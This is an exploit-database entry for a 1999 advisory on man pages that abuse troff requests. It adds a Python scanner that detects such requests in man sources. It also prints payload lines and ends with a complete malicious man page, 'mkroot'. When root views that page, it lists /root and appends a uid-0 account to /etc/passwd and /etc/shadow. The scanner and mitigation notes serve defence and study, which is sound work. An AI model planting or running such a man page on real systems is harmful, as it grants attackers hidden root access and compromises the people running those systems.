GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage

EDB-ID: 19430

CVE:

Author: Pawel Wilk

Type: local

Platform: Multiple

Date: 1999-07-25


source: https://www.securityfocus.com/bid/540/info

Versions of GNU groff prior to release 1.11a, and standard troff, honour formatting requests that can lead to a local root compromise when the circumstances line up. A malicious user can, in theory, embed t/g|roff requests inside a man page that are executed with the uid of the unsuspecting reader, because the formatter runs as whoever invokes man.

A groff example is a man page that, once read as root, appends a second uid 0 account with an empty password field to /etc/passwd. The requests for this are:

.opena stream /etc/passwd
.write stream r00t::0:0::/:/bin/sh

Other groff requests pose a threat if they end up in a man page that root views:

To execute a command and include its output in the formatted page:

.pso ls -l /root

While groff has since removed some of these, or at least disables them by default, the requests inherited from classic troff (still present in vendor troff, such as on HP-UX and IRIX) remain, for example:

.sy and .pi

which respectively execute a command as system() does and pipe the formatter's output into a program.

These problems have quietly existed and been known about for years, and it is questionable whether this is a true vulnerability at all. When permissions are set properly, so that unprivileged users cannot write to the man page directories and root is not induced to format an attacker-supplied file, exploiting this should _not_ be possible, which makes the problem nothing more than an obscure backdoor at best.
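Checking a man page source for this class of request before anyone privileged formats it, as an added example that is not part of the advisory and not groff code: a small Python scanner that flags control lines reaching .sy, .pi, .pso, .open, .opena or .write (plus .writec and .writem, later groff additions in the same class), including when hidden behind .if or .do or behind the no-break control character, while ignoring quoted macro arguments such as .BI ".pso" and lines escaped with \& (zero-width character), which troff treats as text. The sample man page text inside the block is constructed for the example; the request names are real groff requests.

```python
"""Static scan of troff/man source for requests that run commands or write files.

Added example for the man page backdoor described above; not groff's own code.
Heuristic: any control line (column-one '.' or the no-break control character
"'") whose request, or a request reached later on the same line via .if/.ie/
.el/.while/.do, is one of the command- or file-writing requests below.
"""
import re
import sys

# Request -> what it lets a malicious man page do as the reader's uid.
# .writec/.writem are later groff additions in the same class; they write to
# a stream opened by .open/.opena.
DANGEROUS = {
    "sy": "runs a shell command (system())",
    "pi": "pipes the formatter's output into a command",
    "pso": "runs a command and inserts its output",
    "open": "opens a file for writing, truncating it",
    "opena": "opens a file for appending",
    "write": "writes a line to an open stream",
    "writec": "writes to an open stream without a newline",
    "writem": "writes a macro's body to an open stream",
}

# Control character, optional blanks, then the request or macro name.
CONTROL_LINE = re.compile(r"^[.']\s*([A-Za-z]+)")
# A dangerous request reached later in a control line: after a conditional
# (".if n .sy id") or as the argument of .do (".do sy id", no dot).
EMBEDDED = re.compile(
    r"(?:[.']\s*|\bdo\s+)(" + "|".join(DANGEROUS) + r")(?=\s|$)")
# Quoted macro arguments such as .BI ".pso" " command" are typeset, not run.
QUOTED_ARG = re.compile(r'"[^"]*"')


def scan_troff(text):
    """Return (line_no, severity, request, line) for each suspicious line.

    severity "direct": the line's own request is dangerous and will run.
    severity "indirect": a dangerous request appears later on a control line
    (conditionals and .do still execute it); unquoted macro arguments such
    as ".B .pso" also land here, so review these by hand.
    Lines beginning with \\& are text, so an escaped "\\&.pso" is ignored.
    """
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = CONTROL_LINE.match(line)
        if not m:
            continue  # text line (or comment): no request can start here
        if m.group(1) in DANGEROUS:
            findings.append((line_no, "direct", m.group(1), line))
            continue
        stripped = QUOTED_ARG.sub("", line)
        for em in EMBEDDED.finditer(stripped):
            findings.append((line_no, "indirect", em.group(1), line))
    return findings


# Constructed sample (not a real man page): the advisory's payload, two
# disguised forms, an escaped display copy and a harmless quoted mention.
SAMPLE = r""".TH MKROOT 9 "07-22-1999" "manual page"
.SH DESCRIPTION
The most dangerous requests are:
.TP
.BI ".pso" " command"
runs \fIcommand\fP and inserts its output
.SH EXAMPLES
\&.pso ls -l /root
.opena stream /etc/passwd
.write stream sower:!:0:0::/:/dev/null
.if n .sy id >> /tmp/owned
'  pso tail /etc/passwd
"""


def main(paths):
    """Print findings for each file; return 1 if anything was flagged."""
    flagged = 0
    for path in paths:
        with open(path, encoding="latin-1") as fh:  # man sources are often 8-bit
            for line_no, severity, request, line in scan_troff(fh.read()):
                print(f"{path}:{line_no}: {severity} .{request}: "
                      f"{DANGEROUS[request]}\n    {line}")
                flagged = 1
    return flagged


if __name__ == "__main__":
    if len(sys.argv) > 1:
        sys.exit(main(sys.argv[1:]))
    for finding in scan_troff(SAMPLE):  # demo on the constructed sample
        print(finding)
```

Run it as `python3 scan_troff.py /usr/share/man/man*/*` (the file name is the example's own) to sweep a man tree; a non-zero exit means something was flagged. This is a source-side check only. The run-time mitigation is groff's -S safer mode, which refuses .open, .opena, .pso, .sy and .pi (later releases make it the default and require -U to turn it off), together with man page directories that unprivileged users cannot write to.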

.\" Copyright (c) 1999 Paweł Wilk <siewca@dione.ids.pl>
.\"
.\" This is free documentation; you can redistribute it and/or
.\" modify it under the terms of the GNU General Public License as
.\" published by the Free Software Foundation; either version 2 of
.\" the License, or (at your option) any later version.
.\"
.\" The GNU General Public License's references to "object code"
.\" and "executables" are to be interpreted as the output of any
.\" document formatting or typesetting system, including
.\" intermediate and printed output.
.\"
.\" This manual is distributed in the hope that it will be useful,
.\" but WITHOUT ANY WARRANTY; without even the implied warranty of
.\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
.\" GNU General Public License for more details.
.\"
.\" You should have received a copy of the GNU General Public
.\" License along with this manual; if not, write to the Free
.\" Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139,
.\" USA.
.\"
.TH MKROOT 9 "07-22-1999" "manual page" "Linux Hacker's Manual"
.SH NAME
mkroot \- make a root-shell
.SH SYNOPSIS
.BI "man mkroot"
.SH DISCLAIMER
This manual page contains some \fBtroff\fP requests which could break your system's
security. If you are reading this page while logged in as root, then you should know
that at this very moment you have already created a new privileged account
called "sower". The account is disabled by default for security reasons.
Don't forget to remove it! ;->

This is for information only.... use it at your own risk.

.SH DESCRIPTION
Manual pages are usually written with \fBtroff\fP (see
.BR troff (1)
) macros. The point is that some \fBtroff\fP requests can access files or
even invoke shell commands. That is useful, but consider that the requests
contained in a manual page run with the privileges of whoever invokes
\fBtroff\fP: if the caller is root, so are they. (!)
.br
.LP
The most dangerous requests are:
.TP
.BI ".pso" " command"
runs \fIcommand\fP and inserts its output into the page
.TP
.BI ".write" " stream string"
used to put the \fIstring\fP into the given \fIstream\fP
.LP
.SH EXAMPLES
.\" Inside .nf/.fi a line that starts with the control character is still a
.\" request, so the displayed copies below are prefixed with \& to typeset
.\" them as text. The copies outside the display blocks are the ones that
.\" execute; the .pso lines are left bare because their output is the display.
.BI "/root directory listing" " .pso ls -l /root"
.nf

.pso ls -l /root

.fi
.BI "creating new user called sower (passwd)" " "
.nf

\&.opena stream /etc/passwd
\&.write stream sower:!:0:0::/:/dev/null

.fi
.opena stream /etc/passwd
.write stream sower:!:0:0::/:/dev/null
.\" close (and so flush) the stream, or the preview below may not see the line
.close stream
.BI "little preview" " .pso tail /etc/passwd"
.nf

.pso tail /etc/passwd

.fi

.BI "playing with shadow" ""
.nf

\&.opena stream /etc/shadow
\&.write stream sower:*:10531:0:99999:7::10794:

.fi
.opena stream /etc/shadow
.write stream sower:*:10531:0:99999:7::10794:
.close stream
.BI "fingering new user" " .pso finger sower"
.nf

.pso finger sower

.fi
.SH FILES
.I /etc/passwd
.I /etc/shadow

.SH SEE ALSO
.BR man (1),
.BR passwd (1),
.BR troff (1).

.SH AUTHOR
Pawel Wilk <siewca@dione.ids.pl>